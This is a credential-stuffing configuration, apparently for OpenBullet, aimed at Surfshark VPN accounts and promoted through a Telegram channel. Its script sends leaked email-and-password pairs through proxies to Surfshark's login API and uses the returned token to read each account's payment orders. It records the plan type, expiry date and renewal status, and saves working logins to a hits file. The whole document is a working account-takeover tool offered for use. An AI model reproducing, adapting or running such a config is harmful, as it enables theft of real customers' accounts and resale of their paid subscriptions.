[SETTINGS]
{
  "Name": "Surfshark VPN",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-11-17T04:44:18.8250425-08:00",
  "AdditionalInfo": "Telegram Channel : T.me/ghoulblack",
  "RequiredPlugins": [],
  "Author": "👑LilTOBA👑",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://account.surfshark.com/api/v1/auth/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "referer: https://account.surfshark.com/login" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"token\":\"" 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "401" 

PARSE "<SOURCE>" LR "token\":\"" "\",\"" -> VAR "token" 

REQUEST GET "https://account.surfshark.com/api/v1/payment/orders" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "authorization: Bearer <token>" 
  HEADER "referer: https://account.surfshark.com/" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "<SOURCE>" DoesNotContain "isActive\":true" 

#expiration PARSE "<SOURCE>" LR "subscription\":{\"" "\",\"taxCountry" -> VAR "expiration" 

#Expires_on PARSE "<expiration>" LR "expiresAt\":\"" "T" -> CAP "Expires on" 

#plan PARSE "<SOURCE>" LR "productPlanId\":\"" "frequency\":" -> VAR "plan" 

#Plan_type PARSE "<plan>" LR "name\":\"" "\"," -> CAP "Plan type" 

#Renewable PARSE "<SOURCE>" LR "renewable\":" ",\"" -> CAP "Renewable" 

UTILITY File "SurfShark.txt" AppendLines "<USER>: <PASS> //\\n =============================" 

